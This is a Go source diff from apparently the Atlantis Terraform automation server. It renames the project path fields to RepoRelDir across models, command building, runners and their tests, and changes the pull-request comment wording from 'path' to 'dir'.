--- a/server/events/markdown_renderer_test.go
+++ b/server/events/markdown_renderer_test.go
@@ -140,8 +140,8 @@ func TestRenderProjectResults(t *testing.T) {
 							LockURL:         "lock-url",
 						},
 					},
-					Workspace: "workspace",
-					Path:      "path",
+					Workspace:  "workspace",
+					RepoRelDir: "path",
 				},
 			},
 			"Ran Plan in dir: `path` workspace: `workspace`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
@@ -154,8 +154,8 @@ func TestRenderProjectResults(t *testing.T) {
 					ProjectCommandResult: events.ProjectCommandResult{
 						ApplySuccess: "success",
 					},
-					Workspace: "workspace",
-					Path:      "path",
+					Workspace:  "workspace",
+					RepoRelDir: "path",
 				},
 			},
 			"Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n",
@@ -165,8 +165,8 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Workspace: "workspace",
-					Path:      "path",
+					Workspace:  "workspace",
+					RepoRelDir: "path",
 					ProjectCommandResult: events.ProjectCommandResult{
 						PlanSuccess: &events.PlanSuccess{
 							TerraformOutput: "terraform-output",
@@ -175,8 +175,8 @@ func TestRenderProjectResults(t *testing.T) {
 					},
 				},
 				{
-					Workspace: "workspace",
-					Path:      "path2",
+					Workspace:  "workspace",
+					RepoRelDir: "path2",
 					ProjectCommandResult: events.ProjectCommandResult{
 						PlanSuccess: &events.PlanSuccess{
 							TerraformOutput: "terraform-output2",
@@ -185,28 +185,28 @@ func TestRenderProjectResults(t *testing.T) {
 					},
 				},
 			},
-			"Ran Plan for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
+			"Ran Plan for 2 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` dir: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
 		},
 		{
 			"multiple successful applies",
 			events.Apply,
 			[]events.ProjectResult{
 				{
-					Path:      "path",
-					Workspace: "workspace",
+					RepoRelDir: "path",
+					Workspace:  "workspace",
 					ProjectCommandResult: events.ProjectCommandResult{
 						ApplySuccess: "success",
 					},
 				},
 				{
-					Path:      "path2",
-					Workspace: "workspace",
+					RepoRelDir: "path2",
+					Workspace:  "workspace",
 					ProjectCommandResult: events.ProjectCommandResult{
 						ApplySuccess: "success2",
 					},
 				},
 			},
-			"Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n",
+			"Ran Apply for 2 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` dir: `path2`\n```diff\nsuccess2\n```\n---\n\n",
 		},
 		{
 			"single errored plan",
@@ -216,8 +216,8 @@ func TestRenderProjectResults(t *testing.T) {
 					ProjectCommandResult: events.ProjectCommandResult{
 						Error: errors.New("error"),
 					},
-					Path:      "path",
-					Workspace: "workspace",
+					RepoRelDir: "path",
+					Workspace:  "workspace",
 				},
 			},
 			"Ran Plan in dir: `path` workspace: `workspace`\n**Plan Error**\n```\nerror\n```\n\n\n",
@@ -227,8 +227,8 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Path:      "path",
-					Workspace: "workspace",
+					RepoRelDir: "path",
+					Workspace:  "workspace",
 					ProjectCommandResult: events.ProjectCommandResult{
 						Failure: "failure",
 					},
@@ -241,8 +241,8 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Workspace: "workspace",
-					Path:      "path",
+					Workspace:  "workspace",
+					RepoRelDir: "path",
 					ProjectCommandResult: events.ProjectCommandResult{
 						PlanSuccess: &events.PlanSuccess{
 							TerraformOutput: "terraform-output",
@@ -251,49 +251,49 @@ func TestRenderProjectResults(t *testing.T) {
 					},
 				},
 				{
-					Workspace: "workspace",
-					Path:      "path2",
+					Workspace:  "workspace",
+					RepoRelDir: "path2",
 					ProjectCommandResult: events.ProjectCommandResult{
 						Failure: "failure",
 					},
 				},
 				{
-					Workspace: "workspace",
-					Path:      "path3",
+					Workspace:  "workspace",
+					RepoRelDir: "path3",
 					ProjectCommandResult: events.ProjectCommandResult{
 						Error: errors.New("error"),
 					},
 				},
 			},
-			"Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
+			"Ran Plan for 3 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n1. workspace: `workspace` dir: `path3`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` dir: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` dir: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
 		},
 		{
 			"successful, failed, and errored apply",
 			events.Apply,
 			[]events.ProjectResult{
 				{
-					Workspace: "workspace",
-					Path:      "path",
+					Workspace:  "workspace",
+					RepoRelDir: "path",
 					ProjectCommandResult: events.ProjectCommandResult{
 						ApplySuccess: "success",
 					},
 				},
 				{
-					Workspace: "workspace",
-					Path:      "path2",
+					Workspace:  "workspace",
+					RepoRelDir: "path2",
 					ProjectCommandResult: events.ProjectCommandResult{
 						Failure: "failure",
 					},
 				},
 				{
-					Workspace: "workspace",
-					Path:      "path3",
+					Workspace:  "workspace",
+					RepoRelDir: "path3",
 					ProjectCommandResult: events.ProjectCommandResult{
 						Error: errors.New("error"),
 					},
 				},
 			},
-			"Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
+			"Ran Apply for 3 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n1. workspace: `workspace` dir: `path3`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` dir: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` dir: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
 		},
 	}
 
diff --git a/server/events/models/models.go b/server/events/models/models.go
index 85f93cf3af..e54e42f548 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -160,6 +160,9 @@ type Project struct {
 	// Path to project root in the repo.
 	// If "." then project is at root.
 	// Never ends in "/".
+	// todo: rename to RepoRelDir to match rest of project once we can separate
+	// out how this is saved in boltdb vs. its usage everywhere else so we don't
+	// break existing dbs.
 	Path string
 }
 
@@ -229,7 +232,7 @@ type ProjectCommandContext struct {
 	// User is the user that triggered this command.
 	User          User
 	Log           *logging.SimpleLogger
-	RepoRelPath   string
+	RepoRelDir    string
 	ProjectConfig *valid.Project
 	GlobalConfig  *valid.Config
 
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 2ce8d85f07..a530ee31d9 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -87,7 +87,7 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 				Pull:          ctx.Pull,
 				User:          ctx.User,
 				Log:           ctx.Log,
-				RepoRelPath:   mp.Path,
+				RepoRelDir:    mp.Path,
 				ProjectConfig: nil,
 				GlobalConfig:  nil,
 				CommentArgs:   nil,
@@ -115,7 +115,7 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 				Log:           ctx.Log,
 				CommentArgs:   nil,
 				Workspace:     mp.Workspace,
-				RepoRelPath:   mp.Dir,
+				RepoRelDir:    mp.Dir,
 				ProjectConfig: &mp,
 				GlobalConfig:  &config,
 			})
@@ -159,7 +159,7 @@ func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cm
 }
 
 func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContext, cmd *CommentCommand, repoDir string) (models.ProjectCommandContext, error) {
-	projCfg, globalCfg, err := p.getCfg(cmd.ProjectName, cmd.Dir, cmd.Workspace, repoDir)
+	projCfg, globalCfg, err := p.getCfg(cmd.ProjectName, cmd.RepoRelDir, cmd.Workspace, repoDir)
 	if err != nil {
 		return models.ProjectCommandContext{}, err
 	}
@@ -167,7 +167,7 @@ func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContex
 	// Override any dir/workspace defined on the comment with what was
 	// defined in config. This shouldn't matter since we don't allow comments
 	// with both project name and dir/workspace.
-	dir := cmd.Dir
+	dir := cmd.RepoRelDir
 	workspace := cmd.Workspace
 	if projCfg != nil {
 		dir = projCfg.Dir
@@ -182,7 +182,7 @@ func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContex
 		Log:                     ctx.Log,
 		CommentArgs:             cmd.Flags,
 		Workspace:               workspace,
-		RepoRelPath:             dir,
+		RepoRelDir:              dir,
 		ProjectConfig:           projCfg,
 		GlobalConfig:            globalCfg,
 		RequireApprovalOverride: p.RequireApproval,
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
index 5ef72a5a77..111e790f40 100644
--- a/server/events/project_command_builder_test.go
+++ b/server/events/project_command_builder_test.go
@@ -218,7 +218,7 @@ projects:
 				Equals(t, false, actCtx.RequireApprovalOverride)
 
 				Equals(t, expCtx.projectConfig, actCtx.ProjectConfig)
-				Equals(t, expCtx.dir, actCtx.RepoRelPath)
+				Equals(t, expCtx.dir, actCtx.RepoRelDir)
 				Equals(t, expCtx.workspace, actCtx.Workspace)
 			}
 		})
@@ -239,10 +239,10 @@ func TestDefaultProjectCommandBuilder_BuildPlanApplyCommand(t *testing.T) {
 		{
 			Description: "no atlantis.yaml",
 			Cmd: events.CommentCommand{
-				Dir:       ".",
-				Flags:     []string{"commentarg"},
-				Name:      events.Plan,
-				Workspace: "myworkspace",
+				RepoRelDir: ".",
+				Flags:      []string{"commentarg"},
+				Name:       events.Plan,
+				Workspace:  "myworkspace",
 			},
 			AtlantisYAML:     "",
 			ExpProjectConfig: nil,
@@ -253,7 +253,7 @@ func TestDefaultProjectCommandBuilder_BuildPlanApplyCommand(t *testing.T) {
 		{
 			Description: "no atlantis.yaml with project flag",
 			Cmd: events.CommentCommand{
-				Dir:         ".",
+				RepoRelDir:  ".",
 				Name:        events.Plan,
 				ProjectName: "myproject",
 			},
@@ -263,9 +263,9 @@ func TestDefaultProjectCommandBuilder_BuildPlanApplyCommand(t *testing.T) {
 		{
 			Description: "simple atlantis.yaml",
 			Cmd: events.CommentCommand{
-				Dir:       ".",
-				Name:      events.Plan,
-				Workspace: "myworkspace",
+				RepoRelDir: ".",
+				Name:       events.Plan,
+				Workspace:  "myworkspace",
 			},
 			AtlantisYAML: `
 version: 2
@@ -288,9 +288,9 @@ projects:
 		{
 			Description: "atlantis.yaml wrong dir",
 			Cmd: events.CommentCommand{
-				Dir:       ".",
-				Name:      events.Plan,
-				Workspace: "myworkspace",
+				RepoRelDir: ".",
+				Name:       events.Plan,
+				Workspace:  "myworkspace",
 			},
 			AtlantisYAML: `
 version: 2
@@ -305,9 +305,9 @@ projects:
 		{
 			Description: "atlantis.yaml wrong workspace",
 			Cmd: events.CommentCommand{
-				Dir:       ".",
-				Name:      events.Plan,
-				Workspace: "myworkspace",
+				RepoRelDir: ".",
+				Name:       events.Plan,
+				Workspace:  "myworkspace",
 			},
 			AtlantisYAML: `
 version: 2
@@ -348,9 +348,9 @@ projects:
 		{
 			Description: "atlantis.yaml with multiple dir/workspaces matching",
 			Cmd: events.CommentCommand{
-				Name:      events.Plan,
-				Dir:       ".",
-				Workspace: "myworkspace",
+				Name:       events.Plan,
+				RepoRelDir: ".",
+				Workspace:  "myworkspace",
 			},
 			AtlantisYAML: `
 version: 2
@@ -369,7 +369,7 @@ projects:
 			Description: "atlantis.yaml with project flag not matching",
 			Cmd: events.CommentCommand{
 				Name:        events.Plan,
-				Dir:         ".",
+				RepoRelDir:  ".",
 				Workspace:   "default",
 				ProjectName: "notconfigured",
 			},
@@ -447,7 +447,7 @@ projects:
 				Equals(t, false, actCtx.RequireApprovalOverride)
 
 				Equals(t, c.ExpProjectConfig, actCtx.ProjectConfig)
-				Equals(t, c.ExpDir, actCtx.RepoRelPath)
+				Equals(t, c.ExpDir, actCtx.RepoRelDir)
 				Equals(t, c.ExpWorkspace, actCtx.Workspace)
 				Equals(t, c.ExpCommentArgs, actCtx.CommentArgs)
 			})
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 2b13f9facf..f8f39e0603 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -57,7 +57,7 @@ type ProjectCommandRunner struct {
 
 func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
 	// Acquire Atlantis lock for this repo/dir/workspace.
-	lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath))
+	lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelDir))
 	if err != nil {
 		return ProjectCommandResult{
 			Error: errors.Wrap(err, "acquiring lock"),
@@ -83,7 +83,7 @@ func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCom
 		}
 		return ProjectCommandResult{Error: cloneErr}
 	}
-	projAbsPath := filepath.Join(repoDir, ctx.RepoRelPath)
+	projAbsPath := filepath.Join(repoDir, ctx.RepoRelDir)
 
 	// Use default stage unless another workflow is defined in config
 	stage := p.defaultPlanStage()
@@ -147,7 +147,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 		}
 		return ProjectCommandResult{Error: err}
 	}
-	absPath := filepath.Join(repoDir, ctx.RepoRelPath)
+	absPath := filepath.Join(repoDir, ctx.RepoRelDir)
 
 	var applyRequirements []string
 	if ctx.ProjectConfig != nil {
diff --git a/server/events/project_command_runner_test.go b/server/events/project_command_runner_test.go
index 530a067339..8d7e63682a 100644
--- a/server/events/project_command_runner_test.go
+++ b/server/events/project_command_runner_test.go
@@ -37,7 +37,7 @@ package events_test
 //	Command: &events.Command{
 //		Name:      events.Plan,
 //		Workspace: "workspace",
-//		Dir:       "",
+//		RepoRelDir:       "",
 //	},
 //	Log:      logging.NewNoopLogger(),
 //	BaseRepo: models.Repo{},
@@ -84,12 +84,12 @@ package events_test
 //	p, runner, _ := setupPlanExecutorTest(t)
 //	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
 //	ctx.Log = logging.NewNoopLogger()
-//	ctx.Command.Dir = "dir1/dir2"
+//	ctx.Command.RepoRelDir = "dir1/dir2"
 //	ctx.Command.Workspace = "workspace-flag"
 //
 //	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")).
 //		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})).
+//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "dir1/dir2"})).
 //		ThenReturn(events.PreExecuteResult{
 //			LockResponse: locking.TryLockResponse{
 //				LockKey: "key",
@@ -121,7 +121,7 @@ package events_test
 //	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
 //	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
 //		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
 //		ThenReturn(events.PreExecuteResult{
 //			LockResponse: locking.TryLockResponse{
 //				LockKey: "key",
@@ -165,7 +165,7 @@ package events_test
 //	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
 //	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
 //		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
 //		ThenReturn(events.PreExecuteResult{
 //			LockResponse: locking.TryLockResponse{
 //				LockKey: "key",
@@ -197,7 +197,7 @@ package events_test
 //	projectResult := events.ProjectResult{
 //		Failure: "failure",
 //	}
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
 //		ThenReturn(events.PreExecuteResult{ProjectResult: projectResult})
 //	r := p.Execute(&planCtx)
 //
@@ -215,9 +215,9 @@ package events_test
 //		ThenReturn("/tmp/clone-repo", nil)
 //
 //	// Both projects will succeed in the PreExecute stage.
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})).
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "path1"})).
 //		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}})
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})).
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "path2"})).
 //		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}})
 //
 //	// The first project will fail when running plan
@@ -253,7 +253,7 @@ package events_test
 //	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
 //	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
 //		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
 //		ThenReturn(events.PreExecuteResult{
 //			ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}},
 //		})
diff --git a/server/events/project_result.go b/server/events/project_result.go
index f01ccd9361..80a3041aaf 100644
--- a/server/events/project_result.go
+++ b/server/events/project_result.go
@@ -18,8 +18,8 @@ import "github.com/runatlantis/atlantis/server/events/vcs"
 // ProjectResult is the result of executing a plan/apply for a project.
 type ProjectResult struct {
 	ProjectCommandResult
-	Path      string
-	Workspace string
+	RepoRelDir string
+	Workspace  string
 }
 
 type ProjectCommandResult struct {
diff --git a/server/events/pull_closed_executor.go b/server/events/pull_closed_executor.go
index c3dc472db2..ec3ce6f825 100644
--- a/server/events/pull_closed_executor.go
+++ b/server/events/pull_closed_executor.go
@@ -44,14 +44,14 @@ type PullClosedExecutor struct {
 }
 
 type templatedProject struct {
-	Path       string
+	RepoRelDir string
 	Workspaces string
 }
 
 var pullClosedTemplate = template.Must(template.New("").Parse(
 	"Locks and plans deleted for the projects and workspaces modified in this pull request:\n" +
 		"{{ range . }}\n" +
-		"- path: `{{ .Path }}` {{ .Workspaces }}{{ end }}"))
+		"- dir: `{{ .RepoRelDir }}` {{ .Workspaces }}{{ end }}"))
 
 // CleanUpPull cleans up after a closed pull request.
 func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullRequest) error {
@@ -83,11 +83,11 @@ func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullReque
 // buildTemplateData formats the lock data into a slice that can easily be
 // templated for the VCS comment. We organize all the workspaces by their
 // respective project paths so the comment can look like:
-// path: {path}, workspaces: {all-workspaces}
+// dir: {dir}, workspaces: {all-workspaces}
 func (p *PullClosedExecutor) buildTemplateData(locks []models.ProjectLock) []templatedProject {
 	workspacesByPath := make(map[string][]string)
 	for _, l := range locks {
-		path := l.Project.RepoFullName + "/" + l.Project.Path
+		path := l.Project.Path
 		workspacesByPath[path] = append(workspacesByPath[path], l.Workspace)
 	}
 
@@ -104,12 +104,12 @@ func (p *PullClosedExecutor) buildTemplateData(locks []models.ProjectLock) []tem
 		workspacesStr := fmt.Sprintf("`%s`", strings.Join(workspace, "`, `"))
 		if len(workspace) == 1 {
 			projects = append(projects, templatedProject{
-				Path:       p,
+				RepoRelDir: p,
 				Workspaces: "workspace: " + workspacesStr,
 			})
 		} else {
 			projects = append(projects, templatedProject{
-				Path:       p,
+				RepoRelDir: p,
 				Workspaces: "workspaces: " + workspacesStr,
 			})
 
diff --git a/server/events/pull_closed_executor_test.go b/server/events/pull_closed_executor_test.go
index 9a6af603ea..e295af5037 100644
--- a/server/events/pull_closed_executor_test.go
+++ b/server/events/pull_closed_executor_test.go
@@ -89,7 +89,7 @@ func TestCleanUpPullComments(t *testing.T) {
 					Workspace: "default",
 				},
 			},
-			"- path: `owner/repo/.` workspace: `default`",
+			"- dir: `.` workspace: `default`",
 		},
 		{
 			"single lock, non-empty path",
@@ -99,7 +99,7 @@ func TestCleanUpPullComments(t *testing.T) {
 					Workspace: "default",
 				},
 			},
-			"- path: `owner/repo/path` workspace: `default`",
+			"- dir: `path` workspace: `default`",
 		},
 		{
 			"single path, multiple workspaces",
@@ -113,7 +113,7 @@ func TestCleanUpPullComments(t *testing.T) {
 					Workspace: "workspace2",
 				},
 			},
-			"- path: `owner/repo/path` workspaces: `workspace1`, `workspace2`",
+			"- dir: `path` workspaces: `workspace1`, `workspace2`",
 		},
 		{
 			"multiple paths, multiple workspaces",
@@ -135,7 +135,7 @@ func TestCleanUpPullComments(t *testing.T) {
 					Workspace: "workspace2",
 				},
 			},
-			"- path: `owner/repo/path` workspaces: `workspace1`, `workspace2`\n- path: `owner/repo/path2` workspaces: `workspace1`, `workspace2`",
+			"- dir: `path` workspaces: `workspace1`, `workspace2`\n- dir: `path2` workspaces: `workspace1`, `workspace2`",
 		},
 	}
 	for _, c := range cases {
diff --git a/server/events/runtime/apply_step_runner.go b/server/events/runtime/apply_step_runner.go
index caea2919c2..6746fae725 100644
--- a/server/events/runtime/apply_step_runner.go
+++ b/server/events/runtime/apply_step_runner.go
@@ -23,7 +23,7 @@ func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []stri
 	planFile := filepath.Join(path, planFileName)
 	stat, err := os.Stat(planFile)
 	if err != nil || stat.IsDir() {
-		return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace)
+		return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelDir, ctx.Workspace)
 	}
 
 	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planFile)
diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go
index 50c6693ee4..8603fbc263 100644
--- a/server/events/runtime/apply_step_runner_test.go
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -21,8 +21,8 @@ func TestRun_NoDir(t *testing.T) {
 		TerraformExecutor: nil,
 	}
 	_, err := o.Run(models.ProjectCommandContext{
-		RepoRelPath: ".",
-		Workspace:   "workspace",
+		RepoRelDir: ".",
+		Workspace:  "workspace",
 	}, nil, "/nonexistent/path")
 	ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
 }
@@ -34,8 +34,8 @@ func TestRun_NoPlanFile(t *testing.T) {
 		TerraformExecutor: nil,
 	}
 	_, err := o.Run(models.ProjectCommandContext{
-		RepoRelPath: ".",
-		Workspace:   "workspace",
+		RepoRelDir: ".",
+		Workspace:  "workspace",
 	}, nil, tmpDir)
 	ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
 }
@@ -57,7 +57,7 @@ func TestRun_Success(t *testing.T) {
 		ThenReturn("output", nil)
 	output, err := o.Run(models.ProjectCommandContext{
 		Workspace:   "workspace",
-		RepoRelPath: ".",
+		RepoRelDir:  ".",
 		CommentArgs: []string{"comment", "args"},
 	}, []string{"extra", "args"}, tmpDir)
 	Ok(t, err)
@@ -83,8 +83,8 @@ func TestRun_AppliesCorrectProjectPlan(t *testing.T) {
 		ThenReturn("output", nil)
 	projectName := "projectname"
 	output, err := o.Run(models.ProjectCommandContext{
-		Workspace:   "default",
-		RepoRelPath: ".",
+		Workspace:  "default",
+		RepoRelDir: ".",
 		ProjectConfig: &valid.Project{
 			Name: &projectName,
 		},
@@ -113,7 +113,7 @@ func TestRun_UsesConfiguredTFVersion(t *testing.T) {
 		ThenReturn("output", nil)
 	output, err := o.Run(models.ProjectCommandContext{
 		Workspace:   "workspace",
-		RepoRelPath: ".",
+		RepoRelDir:  ".",
 		CommentArgs: []string{"comment", "args"},
 		ProjectConfig: &valid.Project{
 			TerraformVersion: tfVersion,
diff --git a/server/events/runtime/init_step_runner_test.go b/server/events/runtime/init_step_runner_test.go
index 4a1416fbae..8422f41909 100644
--- a/server/events/runtime/init_step_runner_test.go
+++ b/server/events/runtime/init_step_runner_test.go
@@ -52,9 +52,9 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 				ThenReturn("output", nil)
 
 			output, err := iso.Run(models.ProjectCommandContext{
-				Log:         logger,
-				Workspace:   "workspace",
-				RepoRelPath: ".",
+				Log:        logger,
+				Workspace:  "workspace",
+				RepoRelDir: ".",
 			}, []string{"extra", "args"}, "/path")
 			Ok(t, err)
 			// Shouldn't return output since we don't print init output to PR.
diff --git a/server/events/runtime/plan_step_runner_test.go b/server/events/runtime/plan_step_runner_test.go
index 6c46886992..392279f1eb 100644
--- a/server/events/runtime/plan_step_runner_test.go
+++ b/server/events/runtime/plan_step_runner_test.go
@@ -38,7 +38,7 @@ func TestRun_NoWorkspaceIn08(t *testing.T) {
 		Log:         logger,
 		CommentArgs: []string{"comment", "args"},
 		Workspace:   workspace,
-		RepoRelPath: ".",
+		RepoRelDir:  ".",
 		User:        models.User{Username: "username"},
 	}, []string{"extra", "args"}, "/path")
 	Ok(t, err)
@@ -68,10 +68,10 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) {
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 		ThenReturn("output", nil)
 	_, err := s.Run(models.ProjectCommandContext{
-		Log:         logger,
-		Workspace:   workspace,
-		RepoRelPath: ".",
-		User:        models.User{Username: "username"},
+		Log:        logger,
+		Workspace:  workspace,
+		RepoRelDir: ".",
+		User:       models.User{Username: "username"},
 	}, []string{"extra", "args"}, "/path")
 	ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err)
 }
@@ -118,7 +118,7 @@ func TestRun_SwitchesWorkspace(t *testing.T) {
 			output, err := s.Run(models.ProjectCommandContext{
 				Log:         logger,
 				Workspace:   "workspace",
-				RepoRelPath: ".",
+				RepoRelDir:  ".",
 				User:        models.User{Username: "username"},
 				CommentArgs: []string{"comment", "args"},
 			}, []string{"extra", "args"}, "/path")
@@ -181,7 +181,7 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			output, err := s.Run(models.ProjectCommandContext{
 				Log:         logger,
 				Workspace:   "workspace",
-				RepoRelPath: ".",
+				RepoRelDir:  ".",
 				User:        models.User{Username: "username"},
 				CommentArgs: []string{"comment", "args"},
 			}, []string{"extra", "args"}, "/path")
@@ -214,7 +214,7 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
 	output, err := s.Run(models.ProjectCommandContext{
 		Log:         logger,
 		Workspace:   "workspace",
-		RepoRelPath: ".",
+		RepoRelDir:  ".",
 		User:        models.User{Username: "username"},
